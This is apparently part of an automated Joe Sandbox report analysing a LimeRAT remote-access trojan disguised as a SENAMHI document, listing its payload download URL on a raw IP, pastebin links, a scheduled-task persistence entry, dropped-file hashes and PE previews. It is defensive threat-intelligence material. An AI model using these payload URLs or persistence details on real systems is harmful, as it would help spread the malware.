DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://172.111.242.20/Chrome.exelrDocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.rootca1.amazontrust.com/rootca1.crl0DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://crl.pki.goog/gtsr1/gtsr1.crl0WDocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://172.111.242.20/Chrome.exenDocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502024723.00000000011B2000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmptrue
                              • Avira URL Cloud: malware
                              unknown
                              http://ocsp.rootca1.amazontrust.com0:DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://github.com/syohex/java-simple-mine-sweeperC:DocumentoSENAMHI20222103.exe, 00000001.00000002.83503240355.00000000013B4000.00000002.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83505519609.0000000002FE0000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799775147.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79809451868.000000000118E000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://pki.goog/repository/0DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namewtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83503822976.0000000002C01000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://pki.goog/repo/certs/gtsr1.der04DocumentoSENAMHI20222103.exe, 00000001.00000002.83523648265.0000000006D97000.00000004.00001000.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  172.111.242.20
                                  unknownUnited States
                                  9009M247GBtrue
                                  104.23.98.190
                                  pastebin.comUnited States
                                  13335CLOUDFLARENETUSfalse
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:593268
                                  Start date and time:2022-03-21 13:40:33 +01:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 17m 21s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:DocumentoSENAMHI20222103.exe
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                  Run name:Suspected Instruction Hammering
                                  Number of analysed new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal100.troj.expl.evad.winEXE@10/16@1/2
                                  EGA Information:
                                  • Successful, ratio: 80%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 73
                                  • Number of non-executed functions: 32
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .exe
                                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe
                                  • Excluded domains from analysis (whitelisted): wdcpalt.microsoft.com, client.wns.windows.com, ctldl.windowsupdate.com, wdcp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                  • Execution Graph export aborted for target chrome.exe, PID 6672 because it is empty
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                  • Report size getting too big, too many NtCreateThreadEx calls found.
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                  • Report size getting too big, too many NtResumeThread calls found.
                                  • Report size getting too big, too many NtTerminateThread calls found.
                                  TimeTypeDescription
                                  14:44:44API Interceptor3343x Sleep call for process: cmd.exe modified
                                  14:45:09Task SchedulerRun new task: LimeRAT-Admin path: "C:\Users\user\AppData\Local\Temp\chrome.exe"
                                  14:45:56API Interceptor4x Sleep call for process: chrome.exe modified
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  172.111.242.20193053008-060344.exeGet hashmaliciousBrowse
                                  • 172.111.242.20/drill.exe
                                  104.23.98.190explorer.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/hbwHfEg3
                                  test131.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/ubFNTPjt
                                  C4erXJwD0y.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/VJWK0vZ5
                                  p38z7oEMj6.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/VJWK0vZ5
                                  C1jT7pIYSJ.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/npsqXhuQ
                                  uwoYazbVds.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/npsqXhuQ
                                  u6Wf8vCDUv.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/BCAJ8TgJ
                                  EU441789083.docGet hashmaliciousBrowse
                                  • pastebin.com/raw/BCAJ8TgJ
                                  b095b966805abb7df4ffddf183def880.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  E1Q0TjeN32.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  6YCl3ATKJw.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  Hjnb15Nuc3.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  JDgYMW0LHW.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  4av8Sn32by.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  5T4Ykc0VSK.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  afvhKak0Ir.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  T6OcyQsUsY.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  1KITgJnGbI.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  PxwWcmbMC5.exeGet hashmaliciousBrowse
                                  • pastebin.com/raw/XMKKNkb0
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  pastebin.com21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  31847597.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  31201672.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  npp.8.2.Installer.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  16440147.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  35344724.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  58667292.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  11548671.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  F326863A0C545D8B1FA61CCB715DFEEEAC58BD43A7820.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  nNi82qAuDF.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  H9c7Tcdkf8.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  7qUaNPDddA.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  8E8CAA79DA5237C8973FA2490BFD316A5001E5ED3A517.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  ServiceHub.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  Miner.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  193053008-060344.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  TF.msiGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  KZ524MV4eNnx8.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  415CEF68482C74FCFFF231FAFC63BF9835C72DA00E826.exeGet hashmaliciousBrowse
                                  • 104.23.99.190
                                  explorer.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  CLOUDFLARENETUS#Ufffd#Ufffd 4084107459 Incoming via Txig@Ssb.Texas.Gov.htmlGet hashmaliciousBrowse
                                  • 104.18.10.207
                                  21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  80CDFC120B7824E7CB5B34FC9AB1B6B43B84DFB435FD8.exeGet hashmaliciousBrowse
                                  • 162.159.133.233
                                  https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsites.google.com%2fview%2fhedrick-associates%2fhome&c=E,1,MTFxnR3pzSvJ_jFpovwT1n4JDFioBCKBzvV8w3_A1spci8ac6ZsiMbFcwAwiEAoKyiuq9jyzpi51qgSUqhw6oj_H-kYZ_kHNFjzYZGDiYMO_NnW0&typo=1Get hashmaliciousBrowse
                                  • 188.114.97.7
                                  proforma invoice.exeGet hashmaliciousBrowse
                                  • 162.159.129.233
                                  salary receipt.exeGet hashmaliciousBrowse
                                  • 66.235.200.147
                                  Awb_tracking_receipt_0321202291319800000000000000.xlsxGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  SKM_C55822031512420.exeGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  https://lnkd.in/ejcMeG49Get hashmaliciousBrowse
                                  • 104.16.18.94
                                  SOA87594094.xlsxGet hashmaliciousBrowse
                                  • 23.227.38.74
                                  https://www.kpkserviceshyd.com/E-M/Get hashmaliciousBrowse
                                  • 104.18.11.207
                                  MOD41SA10PSQ4W1.exeGet hashmaliciousBrowse
                                  • 162.159.130.233
                                  DHL SHIPMENT NOTIFICATION 284748395PD.exeGet hashmaliciousBrowse
                                  • 188.114.97.7
                                  Wduepapsz087654367890.exeGet hashmaliciousBrowse
                                  • 162.159.134.233
                                  https://dashing-navy-caribou.slab.com/posts/buscar-documento-adjunto-enviado-desde-depisa-pch57644Get hashmaliciousBrowse
                                  • 104.17.235.61
                                  https://rebrand.ly/rqxhcrwGet hashmaliciousBrowse
                                  • 104.18.174.7
                                  Maersk Global Shippings.exeGet hashmaliciousBrowse
                                  • 162.159.130.233
                                  Payment Advice Scanned-0004.vbsGet hashmaliciousBrowse
                                  • 172.67.203.53
                                  PO#q9503674200.exeGet hashmaliciousBrowse
                                  • 188.114.97.7
                                  TaHhFG5WhI.exeGet hashmaliciousBrowse
                                  • 188.114.97.7
                                  M247GB21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                  • 172.111.242.20
                                  hHmwssEb85.exeGet hashmaliciousBrowse
                                  • 185.232.21.18
                                  0N2qLilRTpGet hashmaliciousBrowse
                                  • 45.86.28.95
                                  YhPgCoo2ZWGet hashmaliciousBrowse
                                  • 38.206.5.197
                                  Ob6qq1yKPBGet hashmaliciousBrowse
                                  • 45.132.178.151
                                  mipsGet hashmaliciousBrowse
                                  • 45.133.181.16
                                  mipsGet hashmaliciousBrowse
                                  • 45.86.28.57
                                  arm7Get hashmaliciousBrowse
                                  • 38.202.250.80
                                  TflzGymnV6Get hashmaliciousBrowse
                                  • 38.207.172.128
                                  VHf02530ocGet hashmaliciousBrowse
                                  • 45.86.28.44
                                  BHakuAOLLwGet hashmaliciousBrowse
                                  • 45.86.28.81
                                  beamer.arm-20220311-1733Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  beamer.mpsl-20220311-1733Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  beamer.x86-20220311-1733Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  beamer.arm5-20220311-1734Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  beamer.arm7-20220311-1734Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  beamer.mips-20220311-1734Get hashmaliciousBrowse
                                  • 193.142.58.171
                                  193053008-060344.exeGet hashmaliciousBrowse
                                  • 172.111.242.20
                                  YBAXAKQXVYWIXQJDE.VBSGet hashmaliciousBrowse
                                  • 37.120.141.190
                                  mir40.oGet hashmaliciousBrowse
                                  • 45.11.2.241
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  54328bd36c14bd82ddaa0c04b25ed9ad21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  Wduepapsz087654367890.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  Payment Advice Scanned-0004.vbsGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  PO#q9503674200.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  TaHhFG5WhI.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  7eAETeI1rf.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  6SbTV88KoM.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  20220321_3339477993743000000,xlsx.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  PO#Z1210800.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  uVI52NaTxi.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  RCR8k8P59l.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  f8U9slm8cV.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  V2gRq9sKJp.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  2bb (1).exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  QUOTATION.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  Halkbank_Ekstre_20222501_ 073653_270424.pdf.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  LvYp51q46H.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  VideoDownloaderSetup.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  65119209.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  86523374.exeGet hashmaliciousBrowse
                                  • 104.23.98.190
                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                  C:\Users\user\AppData\Local\Temp\IconLib.dll21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                    193053008-060344.exeGet hashmaliciousBrowse
                                      641FE9F18EBB130D7A6B63CA7CC7FDE7092E0A7744799.exeGet hashmaliciousBrowse
                                        BEA Copie de paiement bancairepdf.exeGet hashmaliciousBrowse
                                          W8gg1JwtVe.exeGet hashmaliciousBrowse
                                            Itoaamnygg.exeGet hashmaliciousBrowse
                                              488706b8e34f0d64a9023adb6a2570b9983fd741f0306.exeGet hashmaliciousBrowse
                                                F9PZRQUINW.exeGet hashmaliciousBrowse
                                                  INVOICE_.SCR.exeGet hashmaliciousBrowse
                                                    BQBvSqW6KI.dllGet hashmaliciousBrowse
                                                      YlVYlXQ4Da.exeGet hashmaliciousBrowse
                                                        __ __ ___.exeGet hashmaliciousBrowse
                                                          gunzipped.exeGet hashmaliciousBrowse
                                                            xwcTd7Kh9O.exeGet hashmaliciousBrowse
                                                              Request For Quotation.xlsxGet hashmaliciousBrowse
                                                                6rg5Enu1ks.exeGet hashmaliciousBrowse
                                                                  t3uss3bjUL.exeGet hashmaliciousBrowse
                                                                    h3Y0CRAJyq.exeGet hashmaliciousBrowse
                                                                      Order Request.xlsxGet hashmaliciousBrowse
                                                                        Request For Quotation.xlsxGet hashmaliciousBrowse
                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe21b86512de83574c3ad44210d025e93fb28d205cfbd18.exeGet hashmaliciousBrowse
                                                                            Process:C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):540
                                                                            Entropy (8bit):5.340189734206673
                                                                            Encrypted:false
                                                                            SSDEEP:12:Q3La/hz92n4M9tDLI4MWuPuuWzAbDLI4MN58HF/zav:MLU84qpE4KGNsXE4fl/4
                                                                            MD5:9FE65642E50453BE936A61BDB771D427
                                                                            SHA1:81881116AD640C9D636EC6C963C7BBFE41EF8971
                                                                            SHA-256:7F9A773F27CDD40D13425EA47E521E1180A04F3F40FD5DAF3B0EA0798A234EC5
                                                                            SHA-512:CEA29CF76FFB91C929D83C63C7B3616B24B8E519428441B05DA8AEC9E937738AC041EE679C34230369B18C1F0FF6E8381CDD5B2C53434FFE6B0B78135A3F5662
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll",0..
                                                                            Process:C:\Users\user\AppData\Roaming\wtqsCpda..exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):834
                                                                            Entropy (8bit):5.347790748399153
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLU84qpE4KGNsXE4fl/kE4KnKDE4KhKzKhk:Mgv2HKGYHfNkHKnYHKhSok
                                                                            MD5:0C9D5A73767CBB8502A51F59380EE680
                                                                            SHA1:D96EC44FD8B92C107F89F6093F3B2B28F9A59888
                                                                            SHA-256:6C90CCD55387C51C9B510AE2D76596D88F4570D4A046C516A29A535D950AB840
                                                                            SHA-512:FCA74EA2E933DB639CE7B4177559E18623A1FC481792DA2B8B6A3A73BA9A213ABBE182889618C00243CD7B5AF3FFDD9F9B3CE334F72048680EB35BF4D850FF9B
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\68e52ded8d0e73920808d8880ed14efd\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\ccd32e22ed1b362ccbd4b6fe2cda6d0b\System.Management.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\62fe5fc1b5bafb28a19a2754318abf00\System.Core.ni.dll",0..
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):29184
                                                                            Entropy (8bit):5.951469681811296
                                                                            Encrypted:false
                                                                            SSDEEP:384:cB+Sbj6NKom4r+65xAH6kgvqDc0gpEkvDKNrCeJE3WNgP0bVjeNwsN4jhxUQro3C:6pomn65xw6p0gpEK45N62YNw44VxWij
                                                                            MD5:3D7801D573CAB12F3093C219EBFE495C
                                                                            SHA1:E1AD7BE4BA84E44E4EE4339232B984D29C1328D1
                                                                            SHA-256:21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
                                                                            SHA-512:844418BEE9DFC603211E2B7E989879B97523ADC18630F0EA1B8D93377B3D5FD867A19FFD0AF0AC3867D35FC5C8231A1ABBBF11F24F8784AB6349AFD27AC30CC5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_LimeRAT, Description: LimeRAT payload, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\Chrome[1].exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 93%
                                                                            Joe Sandbox View:
                                                                            • Filename: 21b86512de83574c3ad44210d025e93fb28d205cfbd18.exe, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .)b.................n..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tm... ...n.................. ..`.reloc...............p..............@..B........................................................P.......H.......`G...E......V.....................................................(....*..(....*.s.........s.........s.........s.........*.~....o....*.~....o....*.~....o....*.~....o....*6..(....(....*..(....*......(....*..(....*.0................-.(...+.+....*".......*..(....*r~.........-.(...+.....~....*...0..........(....-W(....o....o....r...p(....o....-7r...p(....-+(....-$( ...-.r...p(!...r-..p("...(#...-..ArI..p($...((...r...p(%...r...p(&......('...&((.....%()....(*.....*........
                                                                            Process:C:\Users\user\AppData\Local\Temp\chrome.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):60928
                                                                            Entropy (8bit):5.6690883286891545
                                                                            Encrypted:false
                                                                            SSDEEP:768:WhZeVOIr9zmWGODfqED8zOJI+IpXgJKCAyEpd+rnwTIQJAqLiA4B0FdIOFMBC3Wd:EP1m3KpOKSEp1TzCaFiPBhlg36eiikN
                                                                            MD5:45ECAF5E82DA876240F9BE946923406C
                                                                            SHA1:0E79BFE8ECC9B0A22430D1C13C423FBF0AC2A61D
                                                                            SHA-256:087A0C5F789E964A2FBCB781015D3FC9D1757358BC63BB4E0B863B4DFFDB6E4F
                                                                            SHA-512:6FD4A25051414B2D70569A82DFF5522606BFC34D3EAEEA54D2D924BC9C92E479C7FDA178208026308A1BF9C90BEE9DBCAF8716D85C2AB7F383B43B0734329BC8
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 31%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 23%
                                                                            Joe Sandbox View:
                                                                            • Filename: 21b86512de83574c3ad44210d025e93fb28d205cfbd18.exe, Detection: malicious, Browse
                                                                            • Filename: 193053008-060344.exe, Detection: malicious, Browse
                                                                            • Filename: 641FE9F18EBB130D7A6B63CA7CC7FDE7092E0A7744799.exe, Detection: malicious, Browse
                                                                            • Filename: BEA Copie de paiement bancairepdf.exe, Detection: malicious, Browse
                                                                            • Filename: W8gg1JwtVe.exe, Detection: malicious, Browse
                                                                            • Filename: Itoaamnygg.exe, Detection: malicious, Browse
                                                                            • Filename: 488706b8e34f0d64a9023adb6a2570b9983fd741f0306.exe, Detection: malicious, Browse
                                                                            • Filename: F9PZRQUINW.exe, Detection: malicious, Browse
                                                                            • Filename: INVOICE_.SCR.exe, Detection: malicious, Browse
                                                                            • Filename: BQBvSqW6KI.dll, Detection: malicious, Browse
                                                                            • Filename: YlVYlXQ4Da.exe, Detection: malicious, Browse
                                                                            • Filename: __ __ ___.exe, Detection: malicious, Browse
                                                                            • Filename: gunzipped.exe, Detection: malicious, Browse
                                                                            • Filename: xwcTd7Kh9O.exe, Detection: malicious, Browse
                                                                            • Filename: Request For Quotation.xlsx, Detection: malicious, Browse
                                                                            • Filename: 6rg5Enu1ks.exe, Detection: malicious, Browse
                                                                            • Filename: t3uss3bjUL.exe, Detection: malicious, Browse
                                                                            • Filename: h3Y0CRAJyq.exe, Detection: malicious, Browse
                                                                            • Filename: Order Request.xlsx, Detection: malicious, Browse
                                                                            • Filename: Request For Quotation.xlsx, Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......W...........!..................... ... ....... .......................`............@.................................<...O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................p.......H...........s..........................................................*.(.......*R.s....s....(.......*.0..<.........}......}.....(...............-.r...ps....z..}......}.....*.0...........(...... ...._ ..........-.rC..ps....z.o.....o.....s......s....}......... ........ .....s.. .....|8...... ....s......o......o .....o!......... .......(".........o!......... .... .... .... ....("........+2.{........o.....+ .{..... .....o.....+.r...ps....z(..........o.....o....s#.....o$...o%..
                                                                            Process:C:\Users\user\AppData\Roaming\wtqsCpda..exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):29184
                                                                            Entropy (8bit):5.951469681811296
                                                                            Encrypted:false
                                                                            SSDEEP:384:cB+Sbj6NKom4r+65xAH6kgvqDc0gpEkvDKNrCeJE3WNgP0bVjeNwsN4jhxUQro3C:6pomn65xw6p0gpEK45N62YNw44VxWij
                                                                            MD5:3D7801D573CAB12F3093C219EBFE495C
                                                                            SHA1:E1AD7BE4BA84E44E4EE4339232B984D29C1328D1
                                                                            SHA-256:21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
                                                                            SHA-512:844418BEE9DFC603211E2B7E989879B97523ADC18630F0EA1B8D93377B3D5FD867A19FFD0AF0AC3867D35FC5C8231A1ABBBF11F24F8784AB6349AFD27AC30CC5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: C:\Users\user\AppData\Local\Temp\chrome.exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_LimeRAT, Description: LimeRAT payload, Source: C:\Users\user\AppData\Local\Temp\chrome.exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 93%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .)b.................n..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tm... ...n.................. ..`.reloc...............p..............@..B........................................................P.......H.......`G...E......V.....................................................(....*..(....*.s.........s.........s.........s.........*.~....o....*.~....o....*.~....o....*.~....o....*6..(....(....*..(....*......(....*..(....*.0................-.(...+.+....*".......*..(....*r~.........-.(...+.....~....*...0..........(....-W(....o....o....r...p(....o....-7r...p(....-+(....-$( ...-.r...p(!...r-..p("...(#...-..ArI..p($...((...r...p(%...r...p(&......('...&((.....%()....(*.....*........
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):334288
                                                                            Entropy (8bit):6.806904510927404
                                                                            Encrypted:false
                                                                            SSDEEP:6144:u8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPbjm:ubG7F35BVh8yIZqn6vm
                                                                            MD5:EF12AB9D0B231B8F898067B2114B1BC0
                                                                            SHA1:6D90F27B2105945F9BB77039E8B892070A5F9442
                                                                            SHA-256:2B00FC4F541AC10C94E3556FF28E30A801811C36422546A546A445ACA3F410F7
                                                                            SHA-512:2AA62BFBA556AD8F042942DD25AA071FF6677C257904377C1EC956FD9E862ABCBF379E0CFD8C630C303A32ECE75618C24E3EEF58BDDB705C427985B944689193
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
